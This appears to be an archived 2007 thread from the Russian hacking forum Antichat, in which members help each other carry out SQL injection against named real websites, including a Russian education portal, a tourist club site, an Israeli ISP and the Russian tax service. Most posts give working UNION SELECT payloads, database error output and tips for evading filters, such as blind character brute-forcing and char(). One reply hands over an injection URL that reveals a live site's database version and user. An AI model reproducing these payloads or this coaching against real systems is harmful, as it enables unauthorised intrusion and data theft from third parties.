Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|
13.08.2007, 12:24
|
|
Участник форума
Регистрация: 22.11.2006
Сообщений: 117
Провел на форуме:
1813343
Репутация:
141
|
|
Код:
.php?rid=-1+union+select+1,2,3,column_name,5,6,7,8,9,1,2+from+information_schema.columns+where+table_name='users'+limit+1,1/*
Код:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'users\' limit 1,1/*' at line 5
Он ' фильтрует? Таблица users 100% существует. |
|
|
13.08.2007, 12:25
|
|
[Лишённый самовыражени
Регистрация: 16.01.2005
Сообщений: 1,787
Провел на форуме:
9751379
Репутация:
3812
|
|
Сообщение от x.Elf
http://www.edu.ru/index.php?page_id=50&op=word&wid=-1'
Выодит mysq еррор....начинаю перебор - он мне аццес денайед((
Код:
http://www.edu.ru/index.php?page_id=50&op=word&wid=581 and substring(version(),1,1)=4
там union заменяется на union% и у тя всегда будет ошибка синтаксиса. юзай посимвольный брут
__________________
|
|
|
|
13.08.2007, 13:21
|
|
Участник форума
Регистрация: 06.09.2006
Сообщений: 177
Провел на форуме:
284125
Репутация:
16
|
|
http://www.turclubmai.ru/heading/155/index.php?group=asda&id_top_name='
ни фига ниче не получается сделать пробовал найти количество столбоц , очень странно все короче... посомтрите пожлауйста... в че же я ошибаюсь
ну к примеру делаю запрос такой
http://www.turclubmai.ru/heading/155/index.php?group=asda&id_top_name=1'+union+select+1/*
он мне выводит вот это
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\' union select 1/*' at line 1
Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /www/vhosts/turclubmai.ru/html/heading/index.txt on line 46
странно неправда ли , я короче таким образом дошел до 70 ...)) ни фига ничего а order by даже на 200 писал ошибку и даже на 1 ... не знаю короче помогите..
|
|
|
|
13.08.2007, 13:27
|
|
Leaders of Antichat - Level 4
Регистрация: 11.11.2005
Сообщений: 391
Провел на форуме:
7084941
Репутация:
2277
|
|
Taylorith
http://www.turclubmai.ru/heading/155/index.php?group=asda&id_top_name=-111111111111+union+select+1,version()+/*
5.0.24-standard
db_turclubmai
turclubmai@localhost
Последний раз редактировалось halkfild; 13.08.2007 в 13:30..
|
|
|
|
13.08.2007, 13:35
|
|
Участник форума
Регистрация: 06.09.2006
Сообщений: 177
Провел на форуме:
284125
Репутация:
16
|
|
мля черт .... спасибо чел ) вот дурак не замтеил))
|
|
|
|
15.08.2007, 00:59
|
|
Познающий
Регистрация: 05.08.2007
Сообщений: 30
Провел на форуме:
242062
Репутация:
18
|
|
Сообщение от delay(0)
Он ' фильтрует? Таблица users 100% существует.
Да, попробуй char() использовать, должно получиться.
|
|
|
|
15.08.2007, 21:53
|
|
Новичок
Регистрация: 11.08.2007
Сообщений: 25
Провел на форуме:
131466
Репутация:
11
|
|
Хотел бы узнать если можно что то сделать с данной ошибкой,которую получаю на сайте,после добавки '
Код:
http://www.bezeqint.net/PageText.aspx?cc=010202020311'
|
|
|
|
15.08.2007, 23:02
|
|
Участник форума
Регистрация: 22.11.2006
Сообщений: 117
Провел на форуме:
1813343
Репутация:
141
|
|
Сообщение от sharoff
Да, попробуй char() использовать, должно получиться.
Таблица была в другой базе, br помог, за что ему спасибо. 
|
|
|
|
16.08.2007, 20:03
|
|
Участник форума
Регистрация: 06.09.2006
Сообщений: 177
Провел на форуме:
284125
Репутация:
16
|
|
прива вот покопался в одном сайте
адрес вот такого типа http://www.site.ru/document.php?id=25609'&topic=тут топик естесно )
потсавил ковычку и высветилось вот это
Warning: fopen(/usr/data/www2.nalog.ru/htdocs/mw/root//secure.log) [function.fopen]: failed to open stream: Permission denied in /usr/data/www2.nalog.ru/htdocs/mw/libs/frontend_queries.php on line 15
я знаком тока сос кулем... помогите заюзщать данную ошибку мне незнакомую...лучше скажите что это конкретно означает , к каким видам уязвимости относится и можно ли что нить сделать.....
если идей больше не будет скажите скину сайт в ПМ.
|
|
|
|
16.08.2007, 20:07
|
|
Постоянный
Регистрация: 10.11.2006
Сообщений: 416
Провел на форуме:
5636868
Репутация:
849
|
|
А не страшно nalog.ru ломать? )
ФНС РФ как никак )
и посмотри на что он ругается: secure.log
Если бы не ругался он, то тебя записали бы и потом пришли в гости. А так просто прав нет на запись и все
Последний раз редактировалось Basurman; 16.08.2007 в 20:11..
|
|
|
|
|
|
|
TEST QR: []
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
